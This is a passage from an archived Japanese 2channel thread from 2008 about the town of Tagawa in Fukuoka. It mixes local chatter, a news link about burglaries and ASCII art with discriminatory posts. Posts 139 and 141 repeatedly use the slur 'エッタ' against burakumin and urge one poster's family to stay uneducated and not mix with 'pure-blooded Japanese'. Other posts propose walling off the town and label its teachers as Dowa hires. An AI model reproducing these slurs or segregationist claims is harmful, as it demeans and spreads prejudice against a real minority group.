バカの利用は簡単。頼む!ガキ、作ってくれな。

133 :名無しさん@お腹いっぱい。:2008/07/30(水) 21:55:38 ID:V3u8kO690
信用金庫も撤退したよw

134 :名無しさん@お腹いっぱい。:2008/07/30(水) 23:52:14 ID:A4vpmKYx0
市から村に格下げ汁

135 :名無しさん@お腹いっぱい。:2008/07/31(木) 10:54:09 ID:u6mLeFHZ0
田川自治区でいくね?w

136 :名無しさん@お腹いっぱい。:2008/07/31(木) 11:25:41 ID:w/9QvKvu0
田川の壁を建設して隔離

137 :memo:2008/08/02(土) 09:49:14 ID:1uESfS+t0
▼狙いはガラス戸が上下に動く勝手口、侵入・窃盗52件を追送検

ttp://s02.megalodon.jp/2008-0802-0944-40/kyushu.yomiuri.co.jp/news/national/20080801-OYS1T00195.htm

138 :名無しさん@お腹いっぱい。:2008/08/05(火) 17:50:29 ID:u/69x4Xl0
私は日雇いの土工、妻はパートのレジ打ちの共働きで幼子あわせて三人で
仲良く暮らしとります。今日は母ちゃんがホルモンを買うてきてくれるので
青唐辛子をちぎってきてダルマ焼酎を飲もうと思うとります。



139 :名無しさん@お腹いっぱい。:2008/08/07(木) 10:17:06 ID:fkuthmKU0
>>138
子供は最低5人作れ。
底辺Bが日本に必要。
子供に学問さすな。中卒で働かせれ。17で父親にさせれ。
酒は限りなく消エタに近い焼酎を毎日飲め。子にも15ですすめれ。
仕事はおまいは規定通り。それでいい。それ以上を望むな。無駄だ。
エッタの血筋を子々孫々引き継げ。純血日本人と混血するな。
それがおまいらの名誉だ。

140 :名無しさん@お腹いっぱい。:2008/08/07(木) 13:27:09 ID:kcywBkGiO
田川出身の教師は同和採用と認定してもおk

141 :名無しさん@お腹いっぱい。:2008/08/07(木) 13:47:26 ID:fkuthmKU0
>>140
同和採用枠はもう無くなる。
彼等は差別なんぞされてない。
彼等は名誉として部落たるものを伝承しているだけ。
彼等の名誉ある主張と純血日本人の継承が単に相違しているだけ。
ここは日本。
自己主張するエッタは不要。それだけ。

142 :名無しさん@お腹いっぱい。:2008/08/14(木) 20:13:02 ID:RaFPXnE0O
革裂と汚汚盗はどっちがやばいんだ?

143 :名無しさん@お腹いっぱい。:2008/08/14(木) 20:20:44 ID:2PNeAGY90
>>138
虚しい負け組みの叫びのようだね。

144 :名無しさん@お腹いっぱい。:2008/08/14(木) 23:29:21 ID:qZNQdbQuO
不覚にもホルモン食いたくなった

145 : ◆WqqQJMJVwQ :2008/08/15(金) 02:42:41 ID:+QgKomSqO
>>138
俺のオヤジも左官工で、オフクロもレジうちバイトやっとったわ
シンパシーを感じるな

146 :名無しさん@お腹いっぱい。:2008/08/15(金) 03:14:33 ID:D2llN0cGO
>>145
ちゃんと納税しろよ。

147 :名無しさん@お腹いっぱい。:2008/08/15(金) 05:46:05 ID:7LH3NAY1O
E田のあたりはさすがや。

148 :名無しさん@お腹いっぱい。:2008/08/15(金) 05:53:31 ID:lWf7XVMxO
西川峰子をバカにするな!

149 :名無しさん@お腹いっぱい。:2008/08/15(金) 07:08:08 ID:7LH3NAY1O
ドゥンピシャー
離婚調停中の夫が御屠場上皇の墓守って、どんだけ〜

150 :名無しさん@お腹いっぱい。:2008/08/15(金) 07:28:42 ID:lWf7XVMxO
どんだけなんだ?

峰子姐さんが赤村出身なのは分かるけど…

151 :名無しさん@お腹いっぱい。:2008/08/15(金) 16:49:53 ID:4fR50F950
前に書いた土工でありますが、>>139の馬鹿話がさらに聞きたい。


152 :名無しさん@お腹いっぱい。:2008/08/15(金) 18:50:15 ID:AwgjxsMN0
田川北は?

153 :名無しさん@お腹いっぱい。:2008/08/15(金) 23:03:01 ID:ibIAS6mC0
マサシ君やリュウちゃんは元気かのぉ…

154 :名無しさん@お腹いっぱい。:2008/08/15(金) 23:42:18 ID:CsdukZ0f0
田川に大学ありますよね

155 :名無しさん@お腹いっぱい。:2008/08/15(金) 23:43:58 ID:CsdukZ0f0
福岡県立大学の生徒はどうですか?

156 :名無しさん@お腹いっぱい。:2008/08/16(土) 00:17:43 ID:Td/PGvVv0
      ノ L ___   
      ⌒ \  /\
     / (●) (●)\
   /    (__人__)   \ 
   |       |::::::::|     |  田川の悪口言ったら許さんきね
   \     `⌒´    /  
     \ ,,,,    ,,, /        ____
    ./:::::::::::::\  ./::ヽ‐、      /     \
   /:::::,::::::::::::::|  |::::::| ::i     /  _ノ '' 'ー \
  ./:::::::| :::::::::::::::|  |::::::| ::i   /  (●)  (●)  \ 
  i::::::/ i::::::::::::::::|  |:::::」 ::i   |      (__人__)    | 田川良い人ばっかりばい
  i::::::i  ^| ̄ ̄  ^|ノ :/    \      ` ⌒´   /
  .ヽ:::ヽ /三三三三)/   ./⌒          ヽ,
   \_):::::::::::::::::::::::::|   ./   /、 。    。 r  \
    .〈::::: ノ::::::| ::::::::|  .(_ ̄ ̄\'        |)  .)
   /:::::::::::::::::::| :::::::::|   /⌒ヽJ三三三三三/  /
   .i::::::::::::::::::::::| :::::::::|  /:::::::::::::::::::;;; ::::::::::::::::::::: し^⌒ヽ
   .i::::::::::::::::::::ノ ::::::::ノ ./::::::::::::::::::::ノ::::::::::::::::::::: 、:::::::::::::::.) 
   .|:::::::::::::/ \::::::/  .|:::::::::::::::::::::|ヽ、::::::::,,:::::ノi:::::::::::::::/
   .ヽ::::/    ヽ:::|__ i::::::::::::::::::ノ    ̄^ ̄  \:::::::/
  .ノ.^/      ヽ、_ ヽ,::::::::/          .ヽ、__つ
  |_/          .ノ.^/   
              .|_/ 


157 :名無しさん@お腹いっぱい。:2008/08/16(土) 18:23:18 ID:jCFLLQgV0
田川陽介ってそんなに良いか?

158 :名無しさん@お腹いっぱい。:2008/08/18(月) 10:21:38 ID:TWOzqJ/30
CDR21

35 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)